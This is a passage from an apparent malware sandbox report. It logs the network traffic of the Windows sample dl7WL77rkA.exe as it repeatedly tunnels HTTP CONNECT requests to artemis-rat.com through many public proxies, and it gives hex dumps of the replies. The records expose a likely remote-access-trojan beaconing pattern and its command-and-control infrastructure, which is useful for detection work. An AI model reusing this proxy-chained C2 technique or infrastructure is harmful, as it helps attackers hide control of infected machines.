                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.269588947 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 f2 8f 3d 5a 22 42 50 e2 9c 30 92 ca 46 90 b0 2b 44 b1 b4 dc bf 42 3d 35 df 95 bb f9 c5 4e 8c 57 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 15 0b 21 b0 e2 f6 a8 c0 49 e2 a2 84 30 96 f8 21 82 58 75 19 e3
                                                                                                                                                                                                                                                            Data Ascii: %! =Z"BP0F+DB=5NW(!I0!XuoW`D9?
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.562817097 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 cb 43 8f 2b 73 c1 81 86 40 35 8b b6 1a a6 12 d8 22 3a 4a cf 6c a9 ca 48 0f a0 de 11 07 13 cd ef f6 75 42 a7 64 41 19 84
                                                                                                                                                                                                                                                            Data Ascii: (C+s@5":JlHuBdA


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            514192.168.2.55145793.190.141.102478513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.505207062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.840183973 CET226INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Length: 101
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            515192.168.2.551373103.83.232.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.511950016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            516192.168.2.5515404.236.183.3780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.516638041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.764094114 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.22.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            517192.168.2.55149945.233.170.749993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.516946077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            518192.168.2.551347103.163.51.254803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.518888950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.920658112 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            519192.168.2.55145454.37.196.18980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.531430960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.201728106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.202614069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.093195915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            520192.168.2.55145543.155.142.116156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.538399935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            521192.168.2.551562104.17.62.87803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.539366007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.694029093 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            522192.168.2.551564104.25.184.189803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.539884090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.694734097 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            523192.168.2.55151768.1.210.16341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.544083118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            524192.168.2.551518184.181.217.22041453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.552673101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            525192.168.2.551426110.43.34.15181183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.553085089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.191091061 CET131INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            526192.168.2.551582104.16.105.15803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.553419113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.707760096 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            527192.168.2.55158050.63.12.33317853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.558804989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.029817104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.561103106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.701925039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.905159950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            528192.168.2.551492173.212.209.49643093876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.570661068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            529192.168.2.55149889.163.157.129803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.570864916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.232964039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.202833891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.093144894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.905376911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.701953888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.499191046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.092576981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            530192.168.2.55144342.193.58.9680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.571227074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.751040936 CET58INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            531192.168.2.551602162.159.241.160803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.571238041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.743216038 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
